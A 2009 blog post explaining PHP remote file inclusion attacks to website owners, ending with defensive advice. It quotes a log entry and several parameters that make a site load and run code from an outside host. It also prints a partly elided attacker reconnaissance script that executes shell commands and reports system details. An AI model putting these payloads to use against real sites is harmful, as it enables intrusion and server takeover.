How websites gets hacked.

Perhaps a 'bunch of kiddies' as some blogger call them, but they are able to get in. Learn how they do it. (July 26, 2009)

 

Websites get hacked. If you run a website and you have PHP scripts or any other of dynamic web pages, it's more likely that your site got hacked or will get hacked.

 

You may think "It can't happen to me", but you will find sooner or later that someone went into your server and took control of your site. Let's find how they do it.

 

First of all, if you check your 'logs' you will be able to find something like this:

 

Jun 27, 01:40.24,index%20?load=http://somewebsite.etc/bbs/data/text/hackcode.txt???, IP:91.121.83.177, Host:ns352532.ovh.net, Agent:Mozilla/5.0

 

What happen here? Someone or something tried to open the page index%20?load=http://somewebsite.etc/bbs/data/text/hackcode.txt??? - the space (%20) before the question mark tries to "trick" the site - I guess, - and send the query "load=http://somewebsite.etc/bbs/data/text/hackcode.txt". The question marks after the query are used to "trick" the program indicating the "real query" comes next.

 

Basically, someone or something - A program running, of course, - is looking for security flaws on your PHP code and is requesting to load the file indicated. The hacker also tries:

 

  • sel=http://
  • _SERVER[DOCUMENT_ROOT]=http://
  • adresa=http://
  • pagina=http://
  • //manager/admin/u_ins.php?MGR=http://
  • %20%20%A1%B3%C4%D5%E2%F0%1B%24%30%4F%50%65%70%82%9C <- Not the real string.
  •  

    Now, looking the file that the hacker is trying to run, we can find is PHP code. Here is the code:
    <?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>;
    
    Well, it doesn't look like a great hack, it just displays:

     


    FeeLCoMzFeeLCoMz

     

     

    This simple code is just an acknowledge that your website have a security flaw and it is able to execute PHP codes. Once their software gets the string "FeeLCoMzFeeLCoMz" their sofware sends another link to execute a complex code. Here is the code:

     

    <?php
    ##[ Fx29ID ]##
    fx("ID","FeeL"."CoMz");
    $P   = @getcwd();
    $IP  = @getenv("SERVER_ADDR");
    $UID = fx29exec("id");
    fx("SAFE",@safemode()?"ON":"OFF");
    fx("OS",@PHP_OS);
    fx("UNAME",@php_uname());
    fx("SERVER",($IP)?$IP:"-");
    fx("USER",@get_current_user());
    fx("UID",($UID)?$UID:"uid=".@getmyuid()." gid=".@getmygid());
    fx("DIR",$P);
    fx("PERM",(@is_writable($P))?"[W]":"[R]");
    fx("HDD","Used: ".hdd("used")." Free: ".hdd("free")." Total: ".hdd("total"));
    fx("DISFUNC",@getdisfunc());
    ##[ FX29SHEXEC ]##
    function fx($t,$c) {
       echo "$t: "; echo (is_array($c))?join(" ",$c):$c;
       echo "<br>";
    }
    function safemode() {
       // Check the value of safe_mode
    }
    function getdisfunc() {
       $rez = explode(",",@ini_get("disable_functions"));
       return (!empty($rez))?$rez:array();
    }
    function enabled($func) {
       return (function_exists($func) && is_callable($func)
       && !in_array($func,getdisfunc())) ? TRUE : FALSE;
    }
    function fx29exec($cmd) {
      if (enabled("exec")) {
         exec($cmd,$o); $rez = join("\r\n",$o);
      }
      elseif (enabled("shell_exec")) {
         $rez = shell_exec($cmd);
      }
      elseif (enabled("system")) {
         @ob_start(); @system($cmd); $rez = @ob_get_contents();
         @ob_end_clean();
      }
      elseif (enabled("passthru")) {
        @ob_start(); passthru($cmd); $rez = @ob_get_contents();
        @ob_end_clean();
      }
      elseif ( // other junk to read and display the
                  system information
      } else { $rez = "Error!"; }
      return $rez;
    }
    function vsize($size) {
      if (!is_numeric($size)) { return FALSE; }
      else {
        // Calculates the size in GB, MB, KB and Bytes
      }
    }
    function hdd($type) {
      $P = @getcwd(); $T = @disk_total_space($P);
      $F = @disk_free_space($P); $U = $T - $U;
      // Returns the Total disk space, available and used.
    }
    die("FeeLCoMz");
    ?>
    
    Now it is more like a real hack. Whoever see this information, is able to get lots of data about your system. Once they collected this info they can get into your site whenever they want.

     

    You wonder: Who they are?, How they get this information? What is their IP?

     

    Well, They can be anyone and their IP is can't be determined because they are using "zombies" or third party computers. They can put another program on ANY server and run the software to hack another website. They do it using PERL. Even the code is available online but, of course; as website owner, I will not post it online.

     

    My advice to the owners of a website:

     

  • Check your site often, pay attention to your logs.
  • Check the date when your HTML and PHP files were modified.
  • Do not use FTP to access your website as it doesn't encrypt passwords.
  • Do not execute commands or open files directly from your query.
  • If you are using a third party blog or script in your website - for example; guest books, photo uploader, forum - update it frequently.
  •  

    Also, be aware this is not the only hack available to get into your website.

     

     


     < Displaying Special CharactersHomepage
    php Index
    Reverse Sort Arrays With PHP> 

     

    If any information, data, picture or design infringes a copyrighted material, please send me an e-mail asking to remove it along with the supporting data.
    Some features may not work with Google Chrome. © 2006-2010 Jose Pino - Powered by JPC Alpha